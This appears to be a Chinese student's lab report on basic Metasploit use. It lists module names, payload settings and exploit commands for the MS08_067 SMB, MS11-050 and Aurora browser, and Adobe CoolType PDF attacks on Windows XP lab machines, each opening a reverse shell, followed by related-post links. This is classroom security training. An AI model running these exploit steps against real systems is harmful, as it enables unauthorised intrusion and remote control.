20155330 《网络对抗》 Exp5 MSF基础应用
20155330 《网络对抗》 Exp5 MSF基础应用
实践过程记录
主动攻击实践:MS08_067漏洞攻击
- 攻击机:kali
- IP地址:192.168.124.132
- 靶机:windows XP SP3 简体中文
- IP地址:192.168.124.135
- 输入命令
use exploit/windows/smb/ms08_067_netapi
- 设置参数
set payload generic/shell_reverse_tcptcp反向回连
set LHOST 192.168.124.132
set LPORT 5330 端口
set RHOST 192.168.124.135
set target 0
- 并进行攻击
exploit
。
- 结果失败了。
- 然后重新换了一台靶机windows XP SP3(English),重设了攻击目标地址。
- 成功了,使用
systeminfo
查看靶机信息。
针对浏览器攻击:MS11-050漏洞攻击
- 攻击机:kali
- IP地址:192.168.124.132
- 靶机:Windows XP Professional SP3 简体中文
- IP地址:192.168.124.135
- 用
use windows/browser/ms11_050_mshtml_cobjectelement
使用该模块 - 加载payload
set payload windows/meterpreter/reverese_http
,并设置相应参数,打开服务exploit,发起渗透攻击。
- 在靶机中启动IE 7浏览器,访问链接:
http://192.168.124.132:8080/ms5330
;
- 但是在kali攻击机中一直出错,回连没有成功。
- 然后参考组长的博客,将攻击的目标漏洞换成了
MS10_002_aurora
。
针对浏览器攻击:MS10_002_aurora漏洞攻击
- 攻击机:kali
- IP地址:192.168.124.129
- 靶机:Windows XP Professional SP3(English)
- IP地址:192.168.124.136
- 输入下图中的命令并执行攻击
- 在靶机中启动IE 7浏览器,访问链接:
http://192.168.124.132:8080/aurora.html
;
- 本来是回连成功的,但是输入错了命令,然后只好重做了一遍。
- 第二次生成了不同的网址
- 回连成功后使用
sysinfo
查看靶机信息
- 靶机ip地址
针对客户端的攻击:Adobe渗透测试
- 攻击机:kali
- IP地址:192.168.124.129
- 靶机:Windows XP Professional SP3 简体中文
- IP地址:192.168.124.135
- 进入
windows/fileformat/adobe_cooltype_sing
模块设定相关系数并生成相关文件5330.pdf
- 将生成的pdf文件导入到靶机中运行,回连成功!可对靶机进行操作。
- 在靶机中关闭PDF文档后,攻击机与靶机断开连接。
辅助模块
- 输入命令
show auxiliary
查看所有辅助模块
- 选中其中一个模块进入。该模块是用于对smb的版本进行扫描,SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。。
- 设置必要参数,并使用
show options
查看需要设置的消息
- 使用命令run开启扫描,结果如下:
实验后回答问题
exploit
- 攻击。简单来说就是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击。主要分为主动攻击和被动攻击。
payload
- 攻击载荷。类似shellcode,在攻击渗透成功后对被感染计算机进行后门操作,达到攻击效果。
encode
- 编码器。修改字符达到“免杀”目的。
实验感受
这次实验主要对Windows xp系统及其有关应用中的部分漏洞进行了攻击,从而也感受到了msf工具功能的强大。
20155330 《网络对抗》 Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019 20165220 网络对抗 Exp5 MSF基础
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...
- 2018-2019 20165219 网络对抗 Exp5 MSF基础
实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...
- 20145338 《网络对抗》 MSF基础应用
20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...
- 20145308 《网络对抗》 MSF基础应用 学习总结
20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...
- 20145326蔡馨熤《网络对抗》——MSF基础应用
20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...
- 20155218《网络对抗》MSF基础应用
20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...
- 20155304《网络对抗》MSF基础应用
20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...
随机推荐
- 【three.js练习程序】拖动选中的物体
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title> ...
- 前端开发使用Photoshop切图详细步骤
切图的主要目的是从设计师提供的psd中获取网页制作所要的资源 一.界面设置 1. 新建文件,调整界面大小,背景设置为透明 2. 自动选择,把组切换为图层 3. 添加窗口内容,一共四项:图层.历史纪录. ...
- RBAC用户权限管理数据库设计【转载】
本文转载自:https://www.kancloud.cn/martist/ma_zhao_liu/374123 简单地说,一个用户拥有若干角色,每一个角色拥有若干权限.这样,就构造成“用户-角色-权 ...
- BAT文件语法和技巧
首先,批处理文件是一个文本文件,这个文件的每一行都是一条DOS命令(大部分时候就好象我们在DOS提示符下执行的命令行一样),你可以使用DOS下的Edit或者Windows的记事本(notepad)等任 ...
- shell 的echo和 printf
shell的echo指令是输出语句 就好比Python的print 在显示字符串的时候可以省略双引号 但是最好还是带上 echo ' Ti is a dashaobing' echo Ti is ...
- Python学习--Selenium模块简单介绍(1)
简介及运行流程 Selenium 是一个用于Web应用程序测试的工具.Selenium测试直接运行在浏览器中,就像真正的用户在操作一样.支持的浏览器包括IE(7, 8, 9, 10, 11),Mozi ...
- 通过C/C++基于http下载文件
简介 Windows系统如何通过C/C++下载互联网上的文件呢?这里笔者给大家演示一个最简单的方法,利用Windows提供的urlmon库,可以快速实现文件下载的简单实例. 注:本文内容部分参考了&l ...
- Linux运维之系统性能---vmstat工具分析内存的瓶颈
为了提高磁盘存取效率, Linux做了一些精心的设计, 除了对dentry进行缓存(用于VFS,加速文件路径名到inode的转换), 还采取了两种主要Cache方式:Buffer Cache和Page ...
- October 20th 2017 Week 42nd Friday
My life is in these books. Read these and know my heart. 我的人生就在这些书中,读完他们就能读懂我的心. Some people say tha ...
- [LOJ 6029]「雅礼集训 2017 Day1」市场
[LOJ 6029] 「雅礼集训 2017 Day1」市场 题意 给定一个长度为 \(n\) 的数列(从 \(0\) 开始标号), 要求执行 \(q\) 次操作, 每次操作为如下四种操作之一: 1 l ...